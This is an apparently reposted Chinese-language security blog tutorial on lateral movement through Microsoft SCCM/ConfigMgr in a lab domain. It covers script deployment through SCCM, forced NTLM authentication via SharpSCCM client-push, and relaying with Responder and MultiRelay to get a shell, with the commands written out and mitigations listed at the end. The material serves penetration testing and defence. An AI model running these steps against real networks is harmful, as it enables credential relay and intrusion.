利用SCCM进行横向移动

这篇具有很好参考价值的文章主要介绍了利用SCCM进行横向移动。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

01SCCM介绍

SCCM全名为System Center Configuration Manager,从版本1910开始,微软官方将其从Microsoft System
Center产品移除,重新命名为Microsoft Endpoint Configuration Manager(ConfigMgr),其可帮助 IT
部门管理电脑和服务器,保持软件的最新状态,设置配置和安全策略,并监控系统状态,同时让员工能够访问所选设备上的公司应用程序。

##02SCCM安装

SCCM下载:https://www.microsoft.com/zh-cn/evalcenter/evaluate-microsoft-endpoint-
configuration-manager

SCCM安装先决条件* SQLSERVER2012以上* 必须为域内服务器主机,SQLSERVER服务必须使用域内账户管理(普通域用户)* Windows ADK安装:https://docs.microsoft.com/zh-cn/windows-hardware/getstarted/adk-install#other-adk-downloads* 需修改SQLSERVER实例排序规则为SQL_Latin1_General_CP1_CI_AS,修改方法如下暂停SQLSERVER服务cd C:\Program Files\Microsoft SQL Server\110\Setup Bootstrap\SQLServer2012Setup /QUIET /ACTION=REBUILDDATABASE /instancename=mssqlserver /SQLSYSADMINACCOUNTS=PENTEST\administrator /sapwd= /sqlcollation=SQL_Latin1_General_CP1_CI_AS重启SQLSERVER服务* 15G以上的存储空间* 服务器需要安装Remote Differential Compression服务

##03SCCM攻击利用

对于SCCM攻击利用首先查看目标环境是否存在,可以从目标机器中查看是否存在CcmExec.exe程序和ConfigMgr任务序列代理服务,如果存在即目标机器为SCCM的客户端机器,目标环境存在SCCM管理站点。

利用SCCM进行横向移动,网络安全,网络,安全

通过使用SCCM推送恶意文件

利用SCCM软件分发功能,如果攻击者控制了管理站点就可以向客户端进行‘软件分发推送恶意文件。

从软件库中创建powershell脚本执行calc.exe。

利用SCCM进行横向移动,网络安全,网络,安全

创建如下,审批状态是已批准,只有已批准的软件或者脚本才可以下发客户端使用。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-zqCJuyKC-1691676828077)(https://image.3001.net/images/20221102/1667379331_63623083aa9626b1265ad.png!small?1667379332344)]

默认情况下脚本创建作者是不可以审批自己的脚本,如果获取的是平台的完全权限管理员是可以从站点配置中进行修改,使自己审批自己创建的脚本。

利用SCCM进行横向移动,网络安全,网络,安全

通过在站点处层次结构设置中进行修改,取消勾选脚本编写者需要其他脚本审批者,这时在站点中就可以自己批准自己脚本。

利用SCCM进行横向移动,网络安全,网络,安全

通过客户端进行下发成功执行powershell脚本,在客户端机器中执行win32calc.exe。

利用SCCM进行横向移动,网络安全,网络,安全

通过SCCM强制进行NTLM认证

在客户端机器中使用SharpSCCM查询本地站点信息SharpSCCM.exe local siteinfo

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-deH7ceoS-1691676828078)(https://image.3001.net/images/20221102/1667381310_6362383e32c5863ab572c.png!small?1667381310584)]

MSSQL.pentest.com是管理站点地址,XOR是站点代码。

其原理是从wmi命名空间root\ccm去查询客户端注册相关信息,我们可以通过系统提供wbemtest(https://docs.microsoft.com/en-
us/mem/configmgr/develop/core/understand/introduction-to-
wbemtest)连接命名空间root\ccm枚举其中的类。

利用SCCM进行横向移动,网络安全,网络,安全

通过配置我们知道在环境中SCCM要对某个机器下发客户端安装需要通过WMI远程管理,使用配置的账户连接到目标主机的ADMIN$共享,这个配置账号必定是本地管理员组或者是Domain
Admins组用户才能在工作组或域环境中对目标机器进行连接下发安装。就如下图,在站点MSSQL.pentest.com中客户端安装设置中的客户端请求安装属性账户必须是目标计算机上本地管理员组成员。

利用SCCM进行横向移动,网络安全,网络,安全

知道了上面这点,围绕获取这个配置账户的权限又有了如下攻击利用方式,SharpSCCM作者Mayyhem发现当SCCM启用自动站点分配和自动客户端推送安装,并且客户端身份验证不需要PKI证书时,可以将NTLM身份验证从管理点的安装和计算机账户强制转换为任意NetBIOS名称、FQDN或IP地址,允许凭据转发或破解,并且可以在任何Windows
SCCM客户端上的低权限用户来完成。

也就是说通过SCCM进行强制NTLM验证有以下四个条件:* 必须启用边界组的自动站点分配、自动站点范围客户端请求安装和允许连接回退到NTLM(默认开启的)

客户端推送安装属性设置:

利用SCCM进行横向移动,网络安全,网络,安全

建立边界组并勾选将此边界组用于站点分配:

利用SCCM进行横向移动,网络安全,网络,安全* 目标管理点必须能够通过445端口上的SMB访问或者启用WebClient通过任何端口的HTTP访问* PKI证书不能要求客户端对管理点进行身份验证,才能以低权限用户身份执行此攻击

通信安全设置:

利用SCCM进行横向移动,网络安全,网络,安全* 目标机器上没有SCCM客户端存留

SharpSCCM使用SCCM客户端附带客户端消息传递SDK向管理点发送新设备注册请求,表明客户端未安装在指定的NetBIOS名称、FQDN或IP地址上,如果满足上述四个条件,管理站点将启动客户端推送安装,并使用配置账户与目标机器连接。

利用SCCM进行横向移动,网络安全,网络,安全

SharpSCCM使用推送命令如下,在站点中创建192.168.245.151机器:SharpSCCM.exe MSSQL.pentest.com XOR invoke client-push -t 192.168.245.151

利用SCCM进行横向移动,网络安全,网络,安全此时在管理站点中就会发现创建了192.168.245.151机器

利用SCCM进行横向移动,网络安全,网络,安全

在151这台机器中使用responder(在配置文件中关闭SMB和HTTP接收开关)和MultiRelay设置中继服务器,并中继到133这台机器上

smb中继条件: SMB签名是关闭的python MultiRelay.py -t 192.168.245.133 -u ALLresponder -I eth0 -rPv

利用SCCM进行横向移动,网络安全,网络,安全

在使用SharpSCCM推送安装后151主机接收到NTLMv2 hash并中继给了133主机,133主机接收到中继的PENTEST\secadmin
NTLMv2 hash后弹回shell

利用SCCM进行横向移动,网络安全,网络,安全

如何防止SCCM强制进行NTLM认证这种攻击:* 禁用“允许连接回退到NTLM”客户端推送安装设置* 使用基于软件更新的客户端安装(https://docs.microsoft.com/en-us/mem/configmgr/core/clients/deploy/deploy-clients-to-windows-computers),而不是自动全站点客户端推送安装* 需要SMB签名,以防止中继凭据被用于向其他系统进行身份验证* 切勿使用高权限组的成员(域管理员)进行客户端推送安装,相反为此专门为每个站点创建一个没有交互式登录权限的账户,并将其添加到本地管理员组,做到对此账户的监控* 有条件的情况下设置PKI证书进行客户端的身份验证

最后

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
利用SCCM进行横向移动,网络安全,网络,安全
同时每个成长路线对应的板块都有配套的视频提供:
利用SCCM进行横向移动,网络安全,网络,安全
利用SCCM进行横向移动,网络安全,网络,安全
当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
利用SCCM进行横向移动,网络安全,网络,安全
因篇幅有限,仅展示部分资料,有需要的小伙伴,可以【扫下方二维码】免费领取:
利用SCCM进行横向移动,网络安全,网络,安全文章来源地址https://www.toymoban.com/news/detail-638808.html

到了这里,关于利用SCCM进行横向移动的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 网络安全攻防技术:移动安全篇

    随着移动通信技术和移动应用的普及,无线网络、移动智能设备等正以前所未有的速度迅猛发展,已经渗透到了社会的各个方面,成为人们生产和生活不可或缺的工具和手段。此外,被誉为继计算机、互联网之后世界信息产业发展的第三次浪潮的物联网,亦得益于无线网络、

    2024年04月09日
    浏览(51)
  • 利用远控工具横向移动

    目录 利用远控工具横向移动 一、利用远控工具向日葵横向移动 1、向日葵介绍 2、利用思路 二、利用远控工具todesk横向移动 1、Todesk介绍 2、利用思路 三、利用远控工具GoToHTTP横向移动 1、GoToHTTP介绍 2、利用思路 四、利用远控工具RustDESK横向移动 1、RustDESK介绍 2、利用思路 向

    2024年02月07日
    浏览(40)
  • 利用网络威胁情报增强网络安全态势

    在当今的网络威胁形势下,明智且主动的防御策略至关重要。网络威胁情报是组织的重要工具,可帮助他们预测和应对网络风险。网络威胁情报不仅提供原始数据,还提供: 深入了解网络攻击者的动机 了解他们的潜在目标 了解他们的战术 通过提供这种深度信息,网络威胁情

    2024年01月22日
    浏览(61)
  • 内网环境横向移动——利用DCOM(2)

    PTH 部分基于 NTLM 认证进行攻击,而 PTT 基于 kerberos 协议进行攻击 PTT 中最常见的三种攻击方式为:MS14-068、黄金票据、白银票据 MS14-068 是密钥分发中心(KDC)服务中的Windows漏洞。它允许经过身份验证的用户在其Kerberos票证(TGT)中插入任意PAC(表示所有用户权限的结构)。该

    2024年01月24日
    浏览(42)
  • 网络安全--XXE漏洞利用思路

    介绍 XXE 之前,我先来说一下普通的 XML 注入,这个的利用面比较狭窄,如果有的话应该也是逻辑漏洞 如图所示: 既然能插入 XML 代码,那我们肯定不能善罢甘休,我们需要更多,于是出现了 XXE XXE(XML External Entity Injection) 全称为 XML 外部实体注入,从名字就能看出来,这是一

    2024年02月13日
    浏览(44)
  • 网络安全--利用awk分析Apache日志

    一、溯源 你会溯源吗?怎么溯 拿到日志(ssh登录日志,Apache日志),通过日志溯到ip,对日志进行每天的拆分,第二通过awk日志分析工具对每天的日志进行拆分,分析某一个ip今天对我访问多少次,访问的地址是多少,访问的地址是非恶意的还是不恶意的,即使溯源未成功,

    2024年02月12日
    浏览(37)
  • 网络系统安全——MS15_034漏洞利用与安全加固

    Kali   192.168.124.162 Windows server 2008   192.168.124.169 检查2008服务器的IIS网站是否正常,进入2008服务器,使用ie浏览器访问本机地址 切换到kali,使用命令ping来测试他们的连通性 然后使用使用命令curl测试,测试:curl http://192.168.124.169 -H “Host:192.168.124.169” -H “Range:bytes=0-1844674

    2024年02月09日
    浏览(47)
  • 网络安全kali web安全 Kali之msf简单的漏洞利用

    靶机的IP地址为:192.168.173.136 利用nmap工具扫描其开放端口、系统等 整理一下目标系统的相关信息 系统版本:Windows server 2003 开放的端口及服务: 从扫描出的端口发现,目标主机开启了135端口,服务为msrpc(远程过程调用服务),即Windows的RPC服务。 ​针对这个服务,我们就可

    2024年02月09日
    浏览(44)
  • 【网络安全】实操XSS订单系统漏洞(利用盲打)

    博主昵称:跳楼梯企鹅 博主主页面链接:

    2024年01月23日
    浏览(42)
  • 网络安全竞赛——Windows服务漏洞扫描与利用

    1.通过渗透机Kali Linux对靶机场景Windows 7进行系统服务及版本扫描渗透测试,并将该操作显示结果中3389端口对应的服务状态信息作为Flag值提交; 进入kali命令控制台中使用如下命令 Flag:open 2.在msfconsole中用search命令搜索 MS12020 RDP拒绝服务攻击模块,并将回显结果中的漏洞披露

    2024年02月13日
    浏览(44)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包